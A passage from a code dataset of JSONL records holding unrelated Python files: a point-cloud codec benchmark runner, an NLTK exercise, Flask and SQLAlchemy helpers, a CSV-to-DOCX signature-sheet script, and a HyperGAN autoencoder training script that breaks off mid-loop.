'\\\\decoder.cfg')\r\n\t\tseq = (datasetpath + name2 + '.ply')\r\n\t\tenc = (name1 + name2 + name3 + '_enc.ply')\r\n\t\tdec = (name1 + name2 + name3 + '_dec.ply')\r\n\t\tbin = (name1 + name2 + name3 + '.bin')\r\n\t\tenclog = (logpath + name1 + name2 + name3 + '_enc.log')\r\n\t\tdeclog = (logpath + name1 + name2 + name3 + '_dec.log')\r\n\t\tpcelog = (logpath + name1 + name2 + name3 + '_pce.log')\r\n\t\tos.system(tmc3 + ' --config=' + encconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + enc + ' --compressedStreamPath=' + dirpath + bin + ' >' + enclog) \r\n\t\tos.system(tmc3 + ' --config=' + decconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + dec + ' --compressedStreamPath=' + dirpath + bin + ' >' + declog) \r\n\t\tos.system(pce + ' -a ' + seq + ' -b ' + dirpath + dec + ' -l 1 -d 1 -d 1 -r 30000 --nbThreads=10 --dropdups=2 --neighborsProc=1 >' + pcelog)\r\n\t\tgetPointCount(dec,declog,enclog)\t\t\r\n\t\tprint(codname + ' finish')\r\n\t\toutput.write(codname + ' finish\\n')\r\n\t\tsiez_enc = os.path.getsize(enc)\r\n\t\tsiez_dec = os.path.getsize(dec)\r\n\t\tif siez_enc != siez_dec:\r\n\t\t\toutputError.write(codname+'\\n')\r\n\t\tos.remove(enc)\r\n\t\tos.remove(dec)\r\n\t\tos.remove(bin)\r\n\r\n\t\t\r\n#C2\r\ncond = 'lossy-geom-lossy-attrs'\r\nname1 = cond + '_'\r\nC2_lst = list()\r\n#ford_01_file_lst + ford_02_file_lst + ford_03_file_lst\r\nfor name2 in C2_lst:\r\n\tfor num in C2_num_lst:\r\n\t\tname3 = ('_' + num) \r\n\t\tcodname = (name1 + name2 + name3)\r\n\t\tcfgname2 = ('f' + name2[1:8] + 'q1mm')\r\n\t\tencconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\encoder.cfg')\r\n\t\tdecconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\decoder.cfg')\r\n\t\tseq = (datasetpath + name2 + '.ply')\r\n\t\tenc = (name1 + name2 + name3 + '_enc.ply')\r\n\t\tdec = (name1 + name2 + name3 + '_dec.ply')\r\n\t\tbin = (name1 + name2 + name3 + '.bin')\r\n\t\tenclog = (logpath + name1 + name2 + name3 + '_enc.log')\r\n\t\tdeclog = (logpath + name1 + name2 + name3 + '_dec.log')\r\n\t\tpcelog = (logpath + name1 + name2 + name3 + '_pce.log')\r\n\t\tos.system(tmc3 + ' --config=' + encconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + enc + ' --compressedStreamPath=' + dirpath + bin + ' >' + enclog) \r\n\t\tos.system(tmc3 + ' --config=' + decconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + dec + ' --compressedStreamPath=' + dirpath + bin + ' >' + declog) \r\n\t\tos.system(pce + ' -a ' + seq + ' -b ' + dirpath + dec + ' -n ' + seq + ' -l 1 -d 1 -d 1 -r 30000 --nbThreads=10 --dropdups=2 --neighborsProc=1 >' + pcelog)\r\n\t\tgetPointCount(dec,declog,enclog)\t\t\r\n\t\tprint(codname + ' finish')\r\n\t\toutput.write(codname + ' finish\\n')\r\n\t\tsiez_enc = os.path.getsize(enc)\r\n\t\tsiez_dec = os.path.getsize(dec)\r\n\t\tif siez_enc != siez_dec:\r\n\t\t\toutputError.write(codname+'\\n')\r\n\t\tos.remove(enc)\r\n\t\tos.remove(dec)\r\n\t\tos.remove(bin)\r\n\r\n#CW\t\t\r\ncond = 'lossless-geom-lossless-attrs'\r\nname1 = cond + '_'\r\nCW_lst = list()\r\n#ford_01_file_lst + ford_02_file_lst + ford_03_file_lst\r\nfor name2 in CW_lst:\r\n\tfor num in CW_num_lst:\r\n\t\tname3 = ('_' + num) \r\n\t\tcodname = (name1 + name2 + name3)\r\n\t\tcfgname2 = ('f' + name2[1:8] + 'q1mm')\r\n\t\tencconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\encoder.cfg')\r\n\t\tdecconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\decoder.cfg')\r\n\t\tseq = (datasetpath + name2 + '.ply')\r\n\t\tenc = (name1 + name2 + name3 + '_enc.ply')\r\n\t\tdec = (name1 + name2 + name3 + '_dec.ply')\r\n\t\tbin = (name1 + name2 + name3 + '.bin')\r\n\t\tenclog = (logpath + name1 + name2 + name3 + '_enc.log')\r\n\t\tdeclog = (logpath + name1 + name2 + name3 + '_dec.log')\r\n\t\tos.system(tmc3 + ' --config=' + encconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + enc + ' --compressedStreamPath=' + dirpath + bin + ' >' + enclog) \r\n\t\tos.system(tmc3 + ' --config=' + decconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + dec + ' --compressedStreamPath=' + dirpath + bin + ' >' + declog) \r\n\t\tgetPointCount(dec,declog,enclog)\r\n\t\tprint(codname + ' finish')\r\n\t\toutput.write(codname + ' finish\\n')\r\n\t\tsiez_enc = os.path.getsize(enc)\r\n\t\tsiez_dec = os.path.getsize(dec)\r\n\t\tif siez_enc != siez_dec:\r\n\t\t\toutputError.write(codname+'\\n')\r\n\t\tos.remove(enc)\r\n\t\tos.remove(dec)\r\n\t\tos.remove(bin)\r\n\r\n#CY\t\t\r\ncond = 'lossless-geom-nearlossless-attrs'\r\nname1 = cond + '_'\r\nCY_lst = list()\r\n#ford_01_file_lst + ford_02_file_lst + ford_03_file_lst\r\nfor name2 in CY_lst:\r\n\tfor num in CY_num_lst:\r\n\t\tname3 = ('_' + num) \r\n\t\tcodname = (name1 + name2 + name3)\r\n\t\tcfgname2 = ('f' + name2[1:8] + 'q1mm')\r\n\t\tencconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\encoder.cfg')\r\n\t\tdecconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\decoder.cfg')\r\n\t\tseq = (datasetpath + name2 + '.ply')\r\n\t\tenc = (name1 + name2 + name3 + '_enc.ply')\r\n\t\tdec = (name1 + name2 + name3 + '_dec.ply')\r\n\t\tbin = (name1 + name2 + name3 + '.bin')\r\n\t\tenclog = (logpath + name1 + name2 + name3 + '_enc.log')\r\n\t\tdeclog = (logpath + name1 + name2 + name3 + '_dec.log')\r\n\t\tpcelog = (logpath + name1 + name2 + name3 + '_pce.log')\r\n\t\tos.system(tmc3 + ' --config=' + encconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + enc + ' --compressedStreamPath=' + dirpath + bin + ' >' + enclog) \r\n\t\tos.system(tmc3 + ' --config=' + decconfig + ' --uncompressedDataPath=' + seq + ' --reconstructedDataPath=' + dirpath + dec + ' --compressedStreamPath=' + dirpath + bin + ' >' + declog) \r\n\t\tos.system(pce + ' -a ' + seq + ' -b ' + dirpath + dec + ' -l 1 -d 1 -d 1 -r 30000 --nbThreads=10 --dropdups=2 --neighborsProc=1 >' + pcelog)\r\n\t\tgetPointCount(dec,declog,enclog)\r\n\t\tprint(codname + ' finish')\r\n\t\toutput.write(codname + ' finish\\n')\r\n\t\tsiez_enc = os.path.getsize(enc)\r\n\t\tsiez_dec = os.path.getsize(dec)\r\n\t\tif siez_enc != siez_dec:\r\n\t\t\toutputError.write(codname+'\\n')\r\n\t\tos.remove(enc)\r\n\t\tos.remove(dec)\r\n\t\tos.remove(bin)\r\n\r\n#运行end\r\noutputError.close()\r\n\r\n\r\n\t\t\t\r\n\r\n\t\t\r\n","sub_path":"run_f2.py","file_name":"run_f2.py","file_ext":"py","file_size_in_byte":9997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"12179621","text":"import nltk, re, pprint\n# from nltk import work_tokenize # unclear if necessary\n# READ FILE\ndef open_file_and_get_text(filename):\n with open(filename,'r') as our_file:\n text = our_file.read()\n return text # takes the file, reads it. stores it as a string\n\nour_file = \"walden.txt\"\ntext = open_file_and_get_text(our_file)\nw_words = nltk.word_tokenize(text)\n\n\na_words = text.concordance(\"bottom\")\nb_words = w_words.concordance(\"bottom\")\n\n\n# w_words is now a list\nprint(\"These are words\")\nprint(w_words[0:30]) # prints first 29 items in List\nnltk_walden_text = nltk.Text(w_words)\nprint(nltk_walden_text.concordance(\"the\"))\n\n# TOKENIZE file\n\n# FORM SENTENCES - group tokens into list of sentence strings\n\n# SUB SELECT - form a list of sentences incl. \"word-x\"\n\n# DISPLAYER - increment through the subselect, on sentence at a Time\n","sub_path":"nltk-learn/SlowReader-deprecated.py","file_name":"SlowReader-deprecated.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"18406533","text":"import pickle\nimport glob\n\ndef get_best_model(name_pattern):\n f=glob.glob(name_pattern)\n fepoch = [int(i_f.split('-')[-2]) for i_f in f]\n pattern_rep = name_pattern.replace(\"*-*.h5\", \"{:02}-*.h5\").format(max(fepoch))\n model_weight = glob.glob(pattern_rep)[0]\n\n max_epoch = max(fepoch)\n max_auc = float(model_weight[:model_weight.find('.h5')].split('-')[-1])\n\n print(\"...... LOADED MODEL: %s\" % model_weight)\n\n return model_weight, max_epoch, max_auc\n\ndef save_roc_app(fpr, tpr, threshold, val_ep_auc):\n file_fpr=open('file_fpr','w')\n pickle.dump(fpr, file_fpr)\n file_fpr.close()\n\n file_tpr=open('file_tpr','w')\n pickle.dump(tpr, file_tpr)\n file_tpr.close()\n\n file_threshold=open('file_threshold','w')\n pickle.dump(threshold, file_threshold)\n file_threshold.close()\n\n val_info = val_ep_auc \n file_val=open('file_val','w')\n pickle.dump(val_info, file_val)\n file_val.close()\n","sub_path":"my_prediction/auto_pred.py","file_name":"auto_pred.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"469068720","text":"from flask_restful import Resource, abort\nfrom flask import request, redirect, url_for, render_template, make_response\nfrom strategies import config as strategy_config\n\nfrom model import config_builder as cb\nimport config\nfrom controller import strategy_config_store as scs\nfrom controller import experiment_store as es\n\n\nclass AddAssembleConfig(Resource):\n @staticmethod\n def post(hash, copy_id=None, edit_id=None):\n try:\n if not request.form:\n abort(403, message='missing form')\n\n assemble_config_list = cb.generate_assemble_configs(form_data=request.form)\n success = es.add_config_list(hash, edit_id, assemble_config_list, True)\n if success:\n return redirect(url_for('manage_experiment', hash=hash))\n\n abort(403, message=\"Couldn't save to elastic\")\n\n except Exception as e:\n if config.debug_mode:\n abort(400, message=str(e))\n\n else:\n abort(400, message=\"something went wrong\")\n\n def get(self, hash, copy_id=None, edit_id=None):\n try:\n if copy_id or edit_id:\n config_data = scs.get_config_by_id(copy_id if copy_id else edit_id)\n return self.make_response(\n \"edit\" if edit_id else \"copy\",\n config_data.shared_parameters.get('label', \"BUG\"),\n config_data,\n )\n\n return self.make_response(\"add\", \"BUG\")\n\n except Exception as e:\n if config.debug_mode:\n abort(400, message=str(e))\n\n else:\n abort(400, message=\"something went wrong\")\n\n @staticmethod\n def make_response(mode, default_label, config_data=False):\n return make_response(\n render_template(\n 'experiment/add_assembling_config_form.j2',\n title=\"Add Feature Assembling config\",\n default_label=default_label,\n strategies=strategy_config['assembler_strategies'],\n strategy_type=\"assembler_strategies\",\n mode=mode,\n config_data=config_data\n ),\n 200,\n {'Content-Type': 'text/html'}\n )\n","sub_path":"DWF-server/routes/experiment/add_assemble_config.py","file_name":"add_assemble_config.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"574456367","text":"# -*- coding: utf-8 -*-\r\n# coding: utf-8\r\nimport csv\r\nimport os\r\nimport docx\r\n\r\ndef csv_reader(file_obj):\r\n \"\"\"\r\n Read a csv file\r\n \"\"\"\r\n reader = csv.reader(file_obj)\r\n csv_read = [iters for iters in reader]\r\n date = []\r\n for iters in csv_read:\r\n for y in iters:\r\n a = y.replace('\"', '').split(';')\r\n date.append([a[16], a[17], a[19], a[18], a[20]])\r\n return date, len(date), len(date[0])\r\n\r\ndef record_docx(date, rows, cols, doc_file):\r\n doc = docx.Document()\r\n\r\n par = doc.add_paragraph()\r\n par.add_run('С инструктажем по технике безопасности ознакомлен, правила мне ясны. '\r\n 'Я понимаю возможные наступления последствий в виде травм'\r\n ' в связи с неисполнением ТБ и указаний гида/ экскурсовода/сотрудника «Центра путешественников» во время мероприятия__________________ дата____________\\n').bold=True\r\n\r\n # добавляем таблицу NxM\r\n table = doc.add_table(rows=rows, cols=cols+1)\r\n # применяем стиль для таблицы\r\n table.style = 'Table Grid'\r\n\r\n # заполняем таблицу данными\r\n for row in range(rows):\r\n for col in range(cols):\r\n # получаем ячейку таблицы\r\n cell = table.cell(row, col)\r\n # записываем в ячейку данные\r\n cell.text = date[row][col]\r\n\r\n cell = table.cell(0, cols)\r\n cell.text = 'Подпись'\r\n\r\n doc.save(doc_file)\r\n return 'ok'\r\n\r\n\r\nif __name__ == \"__main__\":\r\n csv_path = os.path.abspath(input('Введите назв��ние csv-файла:') + '.csv')\r\n doc_file = input('Введите название docx-файла на выходе:') + '.docx'\r\n doc_path = os.path.abspath(doc_file)\r\n with open(csv_path, \"r\", encoding='utf-8') as f_obj:\r\n date, rows, cols = csv_reader(f_obj)\r\n record_docx(date, rows, cols, doc_file)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"517027806","text":"from zope.security.checker import NamesChecker\n\nfrom sqlalchemy import orm\n\nimport interfaces\nimport relations\nimport soup\nimport types\n\nclass Tuple(object):\n def __init__(self):\n self.data = []\n\n @property\n def adapter(self):\n return orm.collections.collection_adapter(self)\n\n @orm.collections.collection.appender\n def _appender(self, item):\n self.data.append(item)\n \n @orm.collections.collection.iterator\n def _iterator(self):\n return iter(self.data)\n\n @orm.collections.collection.remover\n def _remover(self, item):\n self.data.remove(item)\n\n @orm.collections.collection.converter\n def convert(self, items):\n converted = []\n \n for item in items:\n if not interfaces.IMapped.providedBy(item):\n item = soup.persist(item)\n\n # set up relation\n relation = relations.OrderedRelation()\n relation.target = item\n relation.order = len(converted)\n\n converted.append(relation)\n \n return converted\n\n def __iter__(self):\n return (self[i] for i in range(len(self.data)))\n \n def __getitem__(self, index):\n obj = self.data[index].target\n if interfaces.IBasicType.providedBy(obj):\n return obj.value\n else:\n return obj\n \n def __setitem__(self, index, value):\n return TypeError(\"Object does not support item assignment.\")\n\n def __len__(self):\n return len(self.data)\n \n def __repr__(self):\n return repr(tuple(self))\n \nclass OrderedList(Tuple):\n __Security_checker__ = NamesChecker(\n ('append', 'count', 'extend', 'index', 'insert', 'pop', 'remove', 'reverse', 'sort'))\n\n @orm.collections.collection.appender\n def _appender(self, item):\n self.data.append(item)\n \n @orm.collections.collection.iterator\n def _iterator(self):\n return iter(self.data)\n\n @orm.collections.collection.remover\n def _remover(self, item):\n self.data.remove(item)\n\n @orm.collections.collection.internally_instrumented\n def append(self, item, _sa_initiator=None):\n if not interfaces.IMapped.providedBy(item):\n item = soup.persist(item)\n\n # set up relation\n relation = relations.OrderedRelation()\n relation.target = item\n relation.order = len(self.data)\n\n self.adapter.fire_append_event(relation, _sa_initiator)\n \n # add relation to internal list\n self.data.append(relation)\n\n @orm.collections.collection.internally_instrumented\n def remove(self, item, _sa_initiator=None):\n if interfaces.IMapped.providedBy(item):\n uuid = item.uuid\n else:\n uuid = item._d_uuid\n\n for relation in self.data:\n if relation.right == uuid:\n self.adapter.fire_remove_event(relation, _sa_initiator)\n self.data.remove(relation)\n break\n else:\n raise ValueError(\"Not in list: %s\" % item)\n \n def extend(self, items):\n map(self.append, items)\n\n def count(self, value):\n return list(self).count(value)\n\n def index(self, value, **kwargs):\n for index in range(len(self)):\n if self[index] == value:\n return index\n\n raise ValueError(\"%s not found in list.\" % value)\n\n @orm.collections.collection.internally_instrumented\n def insert(self, index, item):\n stack = self.data[index:]\n del self.data[index:]\n self.append(item)\n for relation in stack:\n relation.order += 1\n self.data.append(relation)\n\n @orm.collections.collection.internally_instrumented\n def pop(self, index=-1, _sa_initiator=None):\n relation = self.data[index]\n obj = relation.target\n \n self.adapter.fire_remove_event(relation, _sa_initiator)\n del self.data[index]\n \n stack = self.data[index:]\n for relation in stack:\n relation.order -= 1\n\n return obj\n \n def reverse(self):\n self.data.reverse()\n for index in range(len(self.data)):\n self.data[index].order = index\n \n def sort(self, **kwargs):\n data = list(self)\n data_relation_mapping = zip(data, self.data)\n\n mapping = {}\n for item, relation in data_relation_mapping:\n relations = mapping.setdefault(item, [])\n relations.append(relation)\n\n data.sort(**kwargs)\n del self.data[:]\n \n for item in data:\n relation = mapping[item].pop()\n relation.order = len(self.data)\n self.data.append(relation) \n \n def __repr__(self):\n return repr(list(self))\n\n @orm.collections.collection.internally_instrumented\n def __setitem__(self, index, value, _sa_initiator=None):\n # remove previous\n relation = self.data[index]\n self.adapter.fire_remove_event(relation, _sa_initiator)\n\n # add new\n self.append(value)\n relation = self.data[-1]\n del self.data[-1]\n\n # replace previous\n relation.order = index\n self.data[index] = relation\n\nclass Dict(dict):\n __Security_checker__ = NamesChecker(\n ('clear', 'copy', 'fromkeys', 'get', 'has_key', 'items', 'iteritems', 'iterkeys', 'itervalues', 'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'))\n\n @property\n def adapter(self):\n return orm.collections.collection_adapter(self)\n\n @orm.collections.collection.appender\n @orm.collections.collection.replaces(1) \n def _appender(self, item):\n dict.__setitem__(self, item.key, item)\n \n @orm.collections.collection.iterator\n def _iterator(self):\n return dict.itervalues(self)\n\n @orm.collections.collection.remover\n def _remover(self, item):\n dict.remove(item)\n\n @orm.collections.collection.internally_instrumented\n def __setitem__(self, key, item, _sa_initiator=None):\n if not interfaces.IMapped.providedBy(item):\n item = soup.persist(item)\n\n # mapped objects may be used as key; internally, we'll use\n # the UUID in this case, however.\n if interfaces.IMapped.providedBy(key):\n key = key.uuid\n\n assert isinstance(key, types.StringTypes), \\\n \"Only strings or mapped objects may be used as keys.\"\n \n # set up relation\n relation = relations.KeyRelation()\n relation.target = item\n relation.key = key\n\n self.adapter.fire_append_event(relation, _sa_initiator)\n dict.__setitem__(self, key, relation)\n\n @orm.collections.collection.converter\n def convert(self, d):\n converted = []\n \n for key, item in d.items():\n if not interfaces.IMapped.providedBy(item):\n item = soup.persist(item)\n\n # set up relation\n relation = relations.KeyRelation()\n relation.target = item\n relation.key = key\n\n converted.append(relation)\n \n return converted\n\n def values(self):\n return [self[key] for key in self]\n\n def itervalues(self):\n return (self[key] for key in self)\n\n @orm.collections.collection.internally_instrumented\n def pop(self, key, _sa_initiator=None):\n relation = dict.pop(self, key)\n obj = relation.target\n \n self.adapter.fire_remove_event(relation, _sa_initiator)\n\n if interfaces.IBasicType.providedBy(obj):\n return obj.value\n else:\n return obj\n\n @orm.collections.collection.internally_instrumented\n def popitem(self, _sa_initiator=None):\n key, relation = dict.popitem(self)\n obj = relation.target\n\n self.adapter.fire_remove_event(relation, _sa_initiator)\n\n if interfaces.IBasicType.providedBy(obj):\n return key, obj.value\n else:\n return key, obj\n\n @orm.collections.collection.internally_instrumented\n def clear(self, _sa_initiator=None):\n for relation in dict.itervalues(self):\n self.adapter.fire_remove_event(relation, _sa_initiator) \n\n dict.clear(self)\n \n def __getitem__(self, key):\n # mapped objects may be used as key; internally, we'll use\n # the UUID in this case, however.\n if interfaces.IMapped.providedBy(key):\n key = key.uuid\n\n assert isinstance(key, types.StringTypes), \\\n \"Only strings or mapped objects may be used as keys.\"\n\n obj = dict.__getitem__(self, key).target\n if interfaces.IBasicType.providedBy(obj):\n return obj.value\n else:\n return obj\n\n def __repr__(self):\n return repr(dict(\n (key, self[key]) for key in self))\n","sub_path":"z3c.dobbin/trunk/src/z3c/dobbin/collections.py","file_name":"collections.py","file_ext":"py","file_size_in_byte":8917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"88601193","text":"import matplotlib\nmatplotlib.use('agg')\nimport os\nimport sys\nimport pprint\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import entropy\n\nimport torch\nimport torch.nn as nn\nfrom torch import optim\nfrom torch.nn import functional as F\nfrom torch.distributions.multivariate_normal import MultivariateNormal\n\nimport ops\nimport utils\n\n\ndef load_args():\n\n parser = argparse.ArgumentParser(description='param-wgan')\n parser.add_argument('--z', default=10, type=int, help='latent space width')\n parser.add_argument('--ze', default=64, type=int, help='encoder dimension')\n parser.add_argument('--batch_size', default=15, type=int)\n parser.add_argument('--epochs', default=200000, type=int)\n parser.add_argument('--dataset', default='gaussian', type=str)\n parser.add_argument('--save_dir', default='./', type=str)\n parser.add_argument('--nd', default=2, type=str)\n parser.add_argument('--beta', default=10, type=int)\n parser.add_argument('--l', default=10, type=int)\n parser.add_argument('--pretrain_e', default=True, type=bool)\n parser.add_argument('--exp', default='0', type=str)\n\n args = parser.parse_args()\n return args\n\ndef to_color_dk(y):\n if y == 0: return 'darkcyan'\n if y == 1: return 'darkmagenta'\n if y == 2: return 'darkgreen'\n if y == 3: return 'darkorange'\ndef to_color_lt(y):\n if y == 0: return 'cyan'\n if y == 1: return 'magenta'\n if y == 2: return 'green'\n if y == 3: return 'orange'\n\n\"\"\" sanity check standard NN \"\"\"\nclass Encoder(nn.Module):\n def __init__(self):\n super(NN, self).__init__()\n self.linear1 = nn.Linear(2, 100)\n self.linear2 = nn.Linear(100, 1)\n def forward(self, x):\n x = F.elu(self.linear1(x))\n return self.linear2(x)\n\nclass Decoder(nn.Module):\n def __init__(self):\n super(NN, self).__init__()\n self.linear1 = nn.Linear(1, 100)\n self.linear2 = nn.Linear(100, 2)\n def forward(self, x):\n x = F.elu(self.linear1(x))\n return self.linear2(x)\nclass AE(nn.Module):\n def __init__(self):\n super(NN, self).__init__()\n self.encoder = Encoder()\n self.decoder = Decoder()\n def forward(self, x):\n z = self.encoder(x)\n x = self.decoder(z)\n return x\n\n\n\"\"\" functional version of the actual target network \"\"\"\ndef eval_nn_f(data, layers):\n e1_w, e1_b, e2_w, e2_b, d1_w, d1_b, d2_w, d2_b = layers\n x = F.elu(F.linear(data, e1_w, bias=e1_b))\n x = F.linear(x, e2_w, bias=e2_b)\n x = F.elu(F.linear(x, d1_w, bias=d1_b))\n x = F.linear(x, d2_w, bias=d2_b)\n return x\n\n\n\"\"\" \ntrains hypergan target network,\nneeds to match above network architectures\n\"\"\"\ndef train_nn(args, Z, data, target):\n \"\"\" calc classifier loss on target architecture \"\"\"\n data, target = data.cuda(), target.cuda()\n target = target.view(-1)\n x = eval_nn_f(data, Z)\n\n loss = F.mse_loss(x, data)\n return loss\n\n\n\"\"\" \nbarebones plotting function\nplots class labels and thats it\n\"\"\"\ndef plot_data(x, y, title):\n plt.close('all')\n datas = [[], [], [], []]\n for (data, target) in zip(x, y):\n datas[target].append(np.array(data))\n plt.scatter(*zip(*datas[0]), alpha=.5, linewidth=.1, edgecolor='k', label='c1')\n plt.scatter(*zip(*datas[1]), alpha=.5, linewidth=.1, edgecolor='k', label='c2')\n plt.scatter(*zip(*datas[2]), alpha=.5, linewidth=.1, edgecolor='k', label='c3')\n plt.xlim(0, 10)\n plt.ylim(0, 10)\n #plt.legend(loc='best')\n plt.savefig('{}/{}'.format(args.save_dir, title))\n\n\n\"\"\" \nthis will plot data from the 4 clusters\ncurrently supports passing class data (x, y) and entropy - alpha\nsaves to some predefined folder\n\"\"\"\ndef plot_data_entropy(x, y, real, preds_all, title):\n plt.close('all')\n fig, ax = plt.subplots(4, 5, figsize=(15,15))\n plt.xlim(-5, 15)\n plt.ylim(-5, 15)\n plt.suptitle('HyperGAN Autoencoding')\n model = 0\n # plot 15 subplots, one for each network prediction\n for xsub in range(3):\n for ysub in range(5):\n preds = preds_all[model, :, :]\n ax[xsub, ysub].set_title('AE {}'.format(model))\n ax[xsub, ysub].set_ylim(-5, 15)\n ax[xsub, ysub].set_xlim(-5, 15)\n for (data, target) in zip(preds, y):\n data = data.cpu().numpy()\n ax[xsub, ysub].scatter(*data, c=to_color_lt(target))\n model += 1\n data_r, target_r = real\n for (data, target) in zip(data_r, target_r):\n data = data.cpu().numpy()\n ax[xsub, ysub].scatter(*data, c=to_color_dk(target), alpha=0.1)\n\n ax[3, 0].set_title('Average AE'.format(model))\n ax[3, 0].set_ylim(-5, 15)\n ax[3, 0].set_xlim(-5, 15) \n for (data, target) in zip(x, y):\n data = data.cpu().numpy()\n ax[3, 0].scatter(*data, c=to_color_lt(target))#, alpha=ent)\n x, y = real\n for (data, target) in zip(x, y):\n data = data.cpu().numpy()\n ax[3, 0].scatter(*data, c=to_color_dk(target), alpha=0.1)\n\n print ('saving to ', args.save_dir)\n plt.savefig(args.save_dir+'/{}'.format(title))\n\n\"\"\"\naggregates predicted classes for plotting \ncan be used for standard NN or for hypergan\nimplements hypergan target network as a functional \npasses whatever data to plotting\n\"\"\"\ndef get_points(mixer, hyperAE, iter, ae=None):\n E1, E2, D1, D2 = hyperAE\n points, targets, ents, probs = [], [], [], []\n data, t = create_data(n=50)\n z = torch.randn(args.batch_size, args.ze).cuda()\n codes = mixer(z)\n l1w, l1b = E1(codes[0], training=False)\n l2w, l2b = E2(codes[1], training=False)\n l3w, l3b = D1(codes[2], training=False)\n l4w, l4b = D2(codes[3], training=False)\n layers_all = [l1w, l1b, l2w, l2b, l3w, l3b, l4w, l4b]\n preds_all = torch.zeros((15, 150, 2))\n for i, p in enumerate(data):\n preds = []\n for (layers) in zip(*layers_all):\n if ae is not None:\n x = ae(p)\n else:\n x = eval_nn_f(p, layers)\n preds.append(x)\n preds_all[:, i, :] = x\n points.append(p)\n #ents.append(entropy(F.softmax(torch.stack(preds), dim=1).mean(0).cpu().numpy().T))\n x = preds_all.mean(0)\n plot_data_entropy(x, t, (data, t), preds_all, 'gaussian_{}'.format(iter))\n \n\n\"\"\" permutes a data and label tensor with the same permutation matrix \"\"\"\ndef perm_data(x, y):\n perm = torch.randperm(len(x))\n x_perm = x[perm, :]\n y_perm = y[perm]\n return x_perm.cuda(), y_perm.cuda()\n\n\ndef create_data(n=2):\n dist1 = MultivariateNormal(torch.tensor([4.0, 4.0]), torch.eye(2)*.05)\n dist2 = MultivariateNormal(torch.tensor([6.0, 4.0]), torch.eye(2)*.05)\n dist3 = MultivariateNormal(torch.tensor([5.0, 7.0]), torch.eye(2)*.05)\n p1 = dist1.sample((n,))\n p2 = dist2.sample((n,))\n p3 = dist3.sample((n,))\n x = torch.stack([p1, p2, p3]).view(-1, 2).cuda()\n y_base = torch.ones(n)\n y = torch.stack([y_base*0, y_base, y_base*2]).long().view(-1).cuda()\n plot_data(x.cpu(), y.cpu(), 'gaussian_2')\n return x, y\n\n\ndef train(args):\n \n mixer = models.MixerS(args).cuda()\n E1 = models.GeneratorE1(args).cuda()\n E2 = models.GeneratorE2(args).cuda()\n D1 = models.GeneratorD1(args).cuda()\n D2 = models.GeneratorD2(args).cuda()\n netD = models.DiscriminatorZ(args).cuda()\n print (mixer, E1, E2, D1, D2)\n\n optimE = optim.Adam(mixer.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimE1 = optim.Adam(E1.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimE2 = optim.Adam(E2.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimD1 = optim.Adam(D1.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimD2 = optim.Adam(D2.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-3)\n optimD = optim.Adam(netD.parameters(), lr=1e-3, betas=(0.5, 0.9), weight_decay=1e-4)\n \n best_test_acc, best_clf_acc, best_test_loss, = 0., 0., np.inf\n args.best_loss, args.best_acc = best_test_loss, best_test_acc\n args.best_clf_loss, args.best_clf_acc = np.inf, 0\n\n print ('==> Creating 4 Gaussians')\n data, targets = create_data()\n one = torch.tensor(1.).cuda()\n mone = one * -1\n print (\"==> pretraining encoder\")\n j = 0\n final = 100.\n e_batch_size = 1000\n if args.pretrain_e is True:\n for j in range(100):\n x = torch.randn(e_batch_size, args.ze).cuda()\n qz = torch.randn(e_batch_size, args.z*4).cuda()\n codes = torch.stack(mixer(x)).view(-1, args.z*4)\n mean_loss, cov_loss = ops.pretrain_loss(codes, qz)\n loss = mean_loss + cov_loss\n loss.backward()\n optimE.step()\n mixer.zero_grad()\n print ('Pretrain Enc iter: {}, Mean Loss: {}, Cov Loss: {}'.format(\n j, mean_loss.item(), cov_loss.item()))\n final = loss.item()\n if loss.item() < 0.1:\n print ('Finished Pretraining Encoder')\n break\n\n print ('==> Begin Training')\n for epoch in range(args.epochs):\n data, targets = perm_data(data, targets)\n z = torch.randn(args.batch_size, args.ze).cuda()\n ze = torch.randn(args.batch_size, args.z).cuda()\n qz = torch.randn(args.batch_size, args.z*4).cuda()\n optimE.zero_grad()\n optimD.zero_grad()\n \n codes = mixer(z)\n noise = torch.randn(args.batch_size, args.ze*4)\n log_pz = ops.log_density(ze, 2).view(-1, 1)\n d_loss, d_q = ops.calc_d_loss(args, netD, ze, codes, log_pz)\n d_loss.backward(retain_graph=True)\n optimD.step()\n optimE.step()\n\n \n optimE.zero_grad()\n 